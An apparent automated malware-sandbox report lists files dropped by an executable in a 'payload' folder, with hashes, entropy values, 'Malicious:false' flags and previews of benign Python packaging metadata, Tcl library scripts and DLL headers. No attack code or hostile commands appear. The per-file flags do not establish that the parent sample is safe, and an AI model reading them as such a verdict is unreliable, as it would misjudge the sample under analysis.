                                                                                                                                                                                                                                            SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                            MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                            SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                            SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                            SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19
                                                                                                                                                                                                                                            Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                            MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                            SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                            SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                            SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:importlib_metadata.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1335
                                                                                                                                                                                                                                            Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                            MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                            SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                            SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                            SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1816344
                                                                                                                                                                                                                                            Entropy (8bit):6.495049871908257
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:CAZ2kQrvqkPY6i6ktWc2uMOxmWu1/0lglMkgshwlfjwtorWy2eMdPhOC9JlQ5ZDR:CA0W9jEoSy2nd9JlQjaq5vWHZ7XM2eDD
                                                                                                                                                                                                                                            MD5:3AE729942D15F4F48B1EA8C91880F1F4
                                                                                                                                                                                                                                            SHA1:D27596D14AF5ADEB02EDAB74859B763BF6AC2853
                                                                                                                                                                                                                                            SHA-256:FE62CA2B01B0EC8A609B48F165CA9C6A91653D3966239243AD352DD4C8961760
                                                                                                                                                                                                                                            SHA-512:355800E9152DAAD675428421B867B6D48E2C8F8BE9CA0284F221F27FAE198C8F07D90980E04D807B50A88F92FFB946DC53B7564E080E2E0684F7F6CCC84FF245
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!.............................................................j....`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11707
                                                                                                                                                                                                                                            Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                                            MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                                            SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                                            SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                                            SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6218
                                                                                                                                                                                                                                            Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                                            MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                                            SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                                            SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                                            SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35136
                                                                                                                                                                                                                                            Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                                            MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                                            SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                                            SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                                            SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):107674
                                                                                                                                                                                                                                            Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                                            MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                                            SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                                            SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                                            SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):118419
                                                                                                                                                                                                                                            Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                                            MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                                            SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                                            SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                                            SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1555736
                                                                                                                                                                                                                                            Entropy (8bit):6.1820383306760185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:gJ3uXVFKflt2zwvzPYHURwgVdF9EWyCzfdmHQnveD4CGan9nViFoHb15K3cmwdbo:yeFSpvzg0RwgVdF9EWyCzfdmHQnveD4Z
                                                                                                                                                                                                                                            MD5:966580716C0D6B7EEC217071A6DF6796
                                                                                                                                                                                                                                            SHA1:E3D2D4A7EC61D920130D7A745586CEB7AAD4184D
                                                                                                                                                                                                                                            SHA-256:AFC13FCE0690C0A4B449EC7ED4FB0233A8359911C1C0BA26A285F32895DBB3D2
                                                                                                                                                                                                                                            SHA-512:CF0675EA888A6D1547842BCFB27D45815B164337B4A285253716917EB157C6DF3CC97CBA8AD2AB7096E8F5131889957E0555BAE9B5A8B64745AC3D2F174E3224
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|...............................................4=....`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138456
                                                                                                                                                                                                                                            Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                                            Encrypted:false
